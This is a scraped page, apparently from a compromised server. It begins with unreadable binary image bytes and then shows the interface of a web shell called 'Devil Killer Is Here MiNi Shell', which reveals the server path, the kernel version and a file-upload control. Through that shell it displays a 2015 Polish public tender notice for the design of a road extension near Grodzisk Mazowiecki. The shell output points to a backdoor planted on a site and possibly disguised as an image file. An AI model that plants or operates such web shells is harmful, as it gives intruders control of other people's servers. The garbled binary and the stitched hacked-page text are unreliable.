JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150416/53067-N-2015.html

<p class="kh_header"><b>Grodzisk Mazowiecki: Wykonanie projektu rozbudowy drogi powiatowej nr 1508 Izdebno Kościelne-Chlebnia</b><br>
<b>Numer ogłoszenia: 53067 - 2015; data zamieszczenia: 16.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Grodzisku Mazowieckim , ul. Traugutta 41, 05-825 Grodzisk Mazowiecki, woj. mazowieckie, tel. 22 7240570, faks 22 7240570.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdgm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu rozbudowy drogi powiatowej nr 1508 Izdebno Kościelne-Chlebnia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie projektu rozbudowy drogi powiatowej nr 1508 Izdebno Kościelne - Chlebnia w ramach zadania inwestycyjnego pn.: Wykonanie projektów: rozbudowa drogi nr 1508 Izdebno Kościelne - Chlebnia na odc. od drogi 579 do drogi 150210, rozbudowa drogi 1510 Stare Kłudno - Żuków na odc. od drogi 579 do drogi 1509, budowa skrzyżowania dróg 1510 i 1509. 1.1. Projekt rozbudowy drogi powiatowej nr 1508 Izdebno Kościelne - Chlebnia. Przedmiot zamówienia obejmuje odcinek o długości 2 500m od km 4+036 do km 6+536 (od drogi wojewódzkiej nr 579 do drogi gminnej nr 150210 relacji Chlebnia - Stare Kłudno). Określona szacunkowa długość drogi jest długością orientacyjną i ma wyłącznie charakter informacyjny. Rzeczywista długość będzie określona przez Wykonawcę na podstawie map geodezyjnych do celów projektowych i projektu budowlanego drogi. Przedmiotowa droga jest drogą powiatową klasy lokalna L, konstrukcja drogi, ich parametry techniczno-użytkowe winny być dostosowane do klasy drogi zgodnie z przepisami zawartymi w Rozporządzeniu Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U. nr 43 poz.430 ), konstrukcję nawierzchni należy zaprojektować dla ruchu KR-3. Ogólne założenia do projektowania: 1.Jezdnia. Szerokości jezdni 6,0 m. W przypadku ograniczeń wynikających z istniejącego zagospodarowania terenu dopuszcza się szer. jezdni 5,5 m w obustronnym oporniku na ławie betonowej z oporem z betonu C12/15 (gr. ławy 20 cm, szer. oporu 15 cm). Warstwa ścieralna z SMA na asfalcie modyfikowanym i twardych skałach. Do warstw mineralno asfaltowych nie dopuszcza się stosowania granulatu i dodatków. 2.Skrzyżowanie z drogą gminną relacji Chlebnia - Stare Kłudno nr 150210W
należy przeanalizować możliwości zaprojektować w formie ronda. 3.Pobocza 
utwardzone kruszywem łamanym naturalnym gr. 15 cm. 4.Chodnik: adaptacja istniejącego chodnika o szer. 1,5 za rowem z uwzględnieniem ewentualnej korekty, przełożeniem, adaptacja istniejącego chodnika przy jezdni, zaprojektowanie chodnika po stronie północnej w obszarze istniejącej zabudowy zabudowanym jeśli będzie taka możliwość, zaprojektowanie chodnika z kostki betonowej czerwonej  na odcinku od drogi wojewódzkiej do istniejącego chodnika oraz od km 4+036 do km 4+508 z uwzględnieniem projektowanej obwodnicy zachodniej Grodziska Mazowieckiego. Obrzeża na ławie betonowej z oporem z betonu C12/15, nawierzchnia chodnika z kostki betonowej czerwonej na podsypce cementowo-piaskowej. Konstrukcja nawierzchni chodnika powinna umożliwiać mechaniczne utrzymanie w okresie letnim i zimowym (ciągnik rolniczy 30 KM). 5.Zjazdy: adaptacja lub przebudowa istniejących zjazdów w ciągu chodnika, budowa zjazdów po drugiej stronie drogi z kostki betonowej szarej, opornik na ławie betonowej z oporem z betonu C12/15 ( gr. ławy 20 cm, szer. oporu 15 cm). Przepusty pod zjazdami z rur PEHD ze ściankami czołowymi prostymi wylewanymi na mokro lub prefabrykowanymi o długości zapewniającej zakotwienie w skarpie i przeciwskarpie rowu i wysokości do krawędzi pobocza. 6.Odwodnienie: powierzchniowe do rowów przydrożnych z odprowadzeniem do rowów melioracyjnych. Z uwagi na istniejące zagospodarowanie terenu przeanalizować możliwość zaprojektowania rowu jednostronnego przy jednostronnym pochyleniu poprzecznym jezdni. W takim przypadku w celu odwodnienia korony drogi po drugiej stronie i nie spowodowania podtapiania terenów przyległych do drogi należy przewidzieć odwodnienie np. drenażem lub w inny sposób. 7.Przepust pod korona drogi: Na omawianym odcinku znajdują się 2 przepusty z rur betonowych i 1 przepust z rur stalowych pod koroną drogi w ciągu rowów melioracyjnych, które będą wymagały przedłużenia lub przebudowy. W przypadku przebudowy należy zastosować rury typu VIPRO. 1.2. Opis stanu istniejącego: Droga na wymienionym odcinku  posiada jezdnię z asfaltu lanego o szerokości  5 m oraz chodnik jednostronny z kostki betonowej o szer. 1,5 m na odc. od km 4+508 do km 6+043 m (chodnik zlokalizowany za rowem na terenach prywatnych, w km  5+762 - 5+791 chodnik zlokalizowany w pasie drogowym przy jezdni). W ciągu drogi zlokalizowany jest most na rzece Mrowna, który w 2015 roku planowany jest do przebudowany na przepust. Szerokość jezdni na przepuście 6m i chodnik szer. 2,8 m ( projekt budowlany i wykonawczy do wglądu w siedzibie Zamawiającego).
2. Zakres i zawartość opracowania.  2.1. Zakres opracowania: Podstawowy zakres rzeczowy zamówienia. Dokumentacja projektowa musi obejmować: 1.Projekt koncepcyjny drogi. 2.Wykonanie mapy do celów projektowych i uzgodnienie projektu w ZUD. 3.Uzyskanie warunków technicznych do projektowania przebudowy ewentualnych kolizji. 4.Projekty budowlane branży drogowej z uwzględnieniem odwodnienia powierzchniowego, ewentualne usunięcie kolizji - przebudowa kolidującego uzbrojenia w zakresie niezbędnym do rozbudowy drogi. 5.Projekty wykonawcze do w/w projektów budowlanych. 6.Projekt gospodarowania drzewostanem.  7.Projekt stałej organizacji ruchu. 8.Specyfikacja techniczna. 9.Kosztorys Inwestorski i Przedmiar robót. 10.Badania geotechniczne oraz ocenę stanu istniejącej nawierzchni i gruntów podłoża. 11.Materiały, uzgodnienia i opinie niezbędne do wniosku o wydanie decyzji zezwalającej na realizację inwestycji drogowej. 12.Pełnienie nadzoru autorskiego na budowie. UWAGA: 
w przypadku wejścia w pas drogi wojewódzkiej nr 719 (droga 579) należy wykonać i uzgodnić oddzielną dokumentację skrzyżowania drogi powiatowej z drogą wojewódzką.
2.2. Zawartość opracowania. 2.2.1. Projekt koncepcyjny: Wykonawca w ciągu 14 dni od daty pozyskania map do celów projektowych winien przedłożyć Zamawiającemu do zatwierdzenia uproszczony projekt koncepcyjny rozbudowy drogi zawierający co najmniej: geometrię drogi, projektowane linie rozgraniczające, proponowany rodzaj i grubość warstw nawierzchni i podbudowy, sposób odwodnienia, rozwiązania dotyczące przebudowy ewentualnych kolizji z istniejącym uzbrojeniem, wskazanie drzew zakwalifikowanych do wycinki. Elaborat terenowo-prawny na mapie zasadniczej zawierający tereny konieczne do zajęcia pod inwestycje drogową z podaniem przybliżonej powierzchni dla każdej działki. Uczestniczenie w spotkaniu z mieszkańcami zorganizowanym przez sołtysa celem zapoznania mieszkańców z projektowanymi rozwiązaniami. Projekt koncepcyjny winien być opracowany w 2 egzemplarzach + 1 egz. w wersji elektronicznej w formacie PDF. 2.2.2. Projekt budowlany: Projekt drogowy budowlany i projekty branżowe należy wykonać w 5 egz. na mapie do celów projektowych 1:500 z naniesionymi granicami własności pasa drogowego oraz z naniesionymi projektowanymi liniami rozgraniczającymi  pas drogowy w formie papierowej i 1 egz. w formie elektronicznej PDF. Projekty budowlane muszą zawierać min. 1 egz. Projektu zagospodarowania na oryginalnej mapie do celów projektowych. Projekt budowlany drogi winien być opracowany w stopniu szczegółowości umożliwiającym uzyskanie Decyzji Zezwalającej na Realizację Inwestycji Drogowej (ZRiD) i spełniać wymagania określone: w ustawie - Prawo budowlane (Dz.U. z 2013r. poz. 1409 z późniejszymi zmianami), w Rozporządzeniu Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. 2012, poz. 462 ze zm.), w Rozporządzeniu Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie ustalenia geotechnicznych warunków posadowienia obiektów budowlanych (Dz.U. z 2012r. poz. 463 ze zm.), w ustawie z dnia 10 kwietnia 2003r o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz.U. z 2013r, poz. 687 ze zm.), Rozporządzeniu Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie ( Dz.U. Nr 43, poz.430 ze zm.), Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz.U. Nr 130, poz. 1389 ze zm.), Ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (Dz.U. z 2013r., poz. 907 ze zm.). 2.2.3. Projekt wykonawczy: Projekt drogowy wykonawczy należy wykonać w 5 egz. na mapie do celów projektowych 1:500 z naniesionymi granicami własności pasa drogowego oraz z naniesionymi projektowanymi liniami rozgraniczającymi pas drogowy w formie papierowej i 1 egz. w formie elektronicznej PDF. Projekt wykonawczy winien być opracowany w stopniu szczegółowości umożliwiającym wykonanie robót i zawierać: trwałą stabilizację punktów wierzchołkowych trasy i geodezyjne określenie ich współrzędnych z naniesieniem na plan sytuacyjny oraz opis. 2.2.4. Projekty wykonawcze branżowe: Projekty wykonawcze branżowe niezbędne dla realizacji przedmiotowej, w tym: projekty usunięcia ewentualnych kolizji z uzbrojeniem technicznym i zagospodarowaniem terenu, projekty i inwentaryzacja zieleni z wykazem i oznaczeniem na mapie drzew i krzewów do ewentualnego usunięcia, projekt  organizacji ruchu na czas budowy, projekt stałej organizacji ruchu z wymaganymi opiniami i zatwierdzony przez organ zarządzający ruchem. Projekty wykonawcze branżowe winny być opracowane w stopniu szczegółowości umożliwiającym wykonanie robót. Projekty wykonawcze branżowe winny być opracowane w 4 egzemplarzach + 1 egz. w wersji elektronicznej w formacie PDF. 2.3. Mapy do celów projektowych: Wykonawca własnym kosztem i staraniem pozyska mapy do celów projektowych. 2.4. Warunki techniczne: Wykonawca na własny koszt uzyska Warunki Techniczne do projektowania usunięcia ewentualnych kolizji. 2.5. Badania geotechniczne oraz ocena stanu istniejącej nawierzchni i gruntów podłoża: Wykonawca we własnym zakresie wykona badania  geotechniczne oraz oceni stan istniejącej nawierzchni i gruntów podłoża w zakresie niezbędnym do uzyskania Decyzji Zezwalającej na Realizację Inwestycji Drogowej i prawidłowego wykonania projektu drogowego. Projektant własnym staraniem i na swój koszt wykona ewentualne odkrywki istniejącego uzbrojenia w zakresie niezbędnym do opracowania projektu. 2.6. Materiały do wniosku o wydanie decyzji zezwalającej na realizację inwestycji drogowej: Wykonawca własnym staraniem i na swój koszt uzyska komplet materiałów niezbędnych do wydania decyzji zezwalającej na realizację inwestycji drogowej, w tym: 1.Decyzję o środowiskowych uwarunkowaniach, 2.wypisy z rejestru gruntów, 3.Decyzje pozwolenie wodno-prawne, 4.Opinie zarządcy dróg gminnych, powiatowych i wojewódzkich, 5.Opinię komunikacyjną organu zarządzającego ruchem w zakresie geometrii, 6.Zbiorcze zestawienie kosztów budowy, po 1 egz, 7.opinie zarządu województwa, zarządu powiatu, burmistrza i inne opinie wynikające z przepisów ustawy o szczególnych zasadach przygotowania i realizacji inwestycji z zakresu dróg publicznych (tj Dz. U z 2013 r poz. 687), 8.mapa w skali co najmniej w skali 1: 5000 przedstawiającą proponowany przebieg drogi , z zaznaczeniem terenu niezbędnego dla obiektów budowlanych, oraz istniejące uzbrojenie terenu, 9.analiza powiązań drogi z innymi drogami publicznymi, 10.określenie zmian w dotychczasowej infrastrukturze zagospodarowania terenu. Zakres zamówienia nie obejmuje wykonania projektu podziału działek i map podziałowych. Wykonawca działając z upoważnienia Inwestora, którym jest Powiat Grodziski przygotuje wniosek o uzyskanie decyzji zezwalającej na realizację inwestycji drogowej wraz z wymaganymi załącznikami, bez map podziałowych. 2.7. Specyfikacje techniczne: Wykonawca opracuje Specyfikacje Techniczne wykonania i odbioru robót budowlanych zgodnie Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2004 Nr 202 poz.2072 z póź. zm.). Specyfikacje Techniczne winny być opracowane w 2 egzemplarzach + 1 egz. w wersji elektronicznej. 2.8. Kosztorys Inwestorski i Przedmiar robót: Wykonawca opracuje Kosztorys inwestorski i Przedmiar robót zgodnie Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym  (Dz. U. 2004 Nr 130 poz.1389 ze zm.). Przedmiar robót należy sporządzić w sposób szczegółowy np. obliczenie powierzchni każdego zjazdu z podaniem działań arytmetycznych oraz kilometrażu, obliczenie powierzchni każdego odcinka chodnika między zjazdami z podaniem działań arytmetycznych oraz kilometrażu itp. Kosztorys inwestorski i Przedmiar robót winien być opracowany w 2 egzemplarzach + 1 egz. w wersji elektronicznej w formacie PDF. W cenie oferty należy uwzględnić ewentualną jednokrotną aktualizację kosztorysu inwestorskiego. 2.9. Uzgodnienia i opinie: Wykonawca uzyska na własny koszt wszelkie uzgodnienia i opinie wymagane przepisami prawa, niezbędne do uzyskania pozwolenia na budowę w tym m.in. od: Zarządców Dróg, organu zarządzającego ruchem, ZUD, gestorów mediów zlokalizowanych w obrębie projektowanej inwestycji, Melioracji, Inwestora, właścicieli posesji w zakresie uzgodnienia wjazdów do posesji, inne uzgodnienia niezbędne do uzyskania decyzji zezwalającej na realizację inwestycji drogowej wynikające z przepisów ustawy o szczególnych zasadach przygotowania i realizacji inwestycji z zakresu dróg publicznych tj Dz. U z 2013 r poz. 687, np. operat wodno-prawny. 2.10. Dokumentacja w formie numerycznej w podanym niżej układzie: 2.10.1. Dokumentacja projektowa na płycie CD - format pliku PDF. 2.10.2. Opisy techniczne, specyfikacje techniczne, na płycie CD - format pliku MsWord i PDF. 2.10.3. Kosztorysy inwestorskie, przedmiar, na płycie CD - w programie Seko Smart i PDF, lub innym programie do kosztorysowania. 2.11. Nadzór autorski: Wykonawca w ramach ceny ofertowej zobowiązany będzie do pełnienia nadzoru autorskiego. W ramach pełnienia nadzoru autorskiego w całym czasie trwania budowy Wykonawca zobowiązuje się do należytej współpracy z Zamawiającym oraz podmiotami, którym zostanie powierzone wykonanie inwestycji tak, aby zapewnić prawidłową i terminową realizację robót zgodnie z projektem, w tym w szczególności do uzgadniania możliwości wprowadzania rozwiązań zamiennych zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego. 2.12. Załącznik graficzny określający przedmiot zamówienia stanowi załącznik nr 8 do niniejszej SIWZ, zawierający mapy Chlebnia - 4 szt. 2.13. W dokumentacji projektowej zabrania się opisywania materiałów i urządzeń za pomocą znaków towarowych, patentów lub pochodzenia, chyba, że jest to uzasadnione specyfiką przedmiotu zamówienia i Wykonawca nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszy sformułowanie (o parametrach wyższych lub równoważnych). W takim przypadku Wykonawca zobowiązany jest sporządzić szczegółowy opis, w jaki sposób równoważność może być weryfikowana przez Zamawiającego. 2.14. Dokumentacja projektowa, jako opis przedmiotu zamówienia, powinna spełniać wszystkie wymogi ustawy Prawo Zamówień Publicznych. 2.15. Wykonawca zobowiązuje się do realizacji i przekazania zamawiającemu przedmiotu umowy wykonanego zgodnie z opisem przedmiotu zamówienia, obowiązującymi normami i przepisami, sztuką budowlaną oraz należytą starannością. 2.16. Zamawiający zobowiązuje się do dokonania wymaganych czynności związanych z przygotowaniem postępowania, w szczególności odebrania prawidłowo wykonanej dokumentacji projektowej oraz do zapłaty wynagrodzenia. 3. Przedmiot umowy obejmuje: W skład dokumentacji projektowej objętej niniejszą umową wchodzi realizacja kompletnej dokumentacji projektowo-kosztorysowej budowlanej, wykonanej w formie papierowej i elektronicznej w ilości: 1)Projekty budowlane po 5 egz. 2)Projekty wykonawcze po 3 egz. 3)Specyfikacje techniczne wykonania i odbioru robót po 2 egz. 4)Kosztorysy inwestorskie po 2 egz. 5)Przedmiary robót po 2 egz. 6)CD nr 1 wersja cyfrowa kosztorysów inwestorskich po 1 egz. 7)CD nr 2 wersja cyfrowa pozostałych opracowań po 1 egz. Dokumentacja w wersji elektronicznej powinna być wykonana w formatach doc, PDF..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność stanowiąca przedmiot zamówienia nie wymaga posiadania szczególnych uprawnień wynikających z przepisów prawa. Zamawiający nie określa szczególnych wymagań. Ocena spełniania warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, na podstawie złożonych wraz z ofertą oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum dwie usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej obejmujących wykonanie projektów budowy, przebudowy, remontów dróg itp. o wartości minimum 50 000 zł brutto, każda. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych lub wykonywanych głównych usług z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, - sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej SIWZ
Za główne usługi uważa się usługi niezbędne do wykazania spełniania warunku w zakresie posiadania wiedzy i doświadczenia. Ocena spełniania warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, na podstawie złożonych wraz z ofertą oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań. Ocena spełniania warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, na podstawie złożonych wraz z ofertą oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań. Ocena spełniania warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, na podstawie złożonych wraz z ofertą oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań. Ocena spełniania warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, na podstawie złożonych wraz z ofertą oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

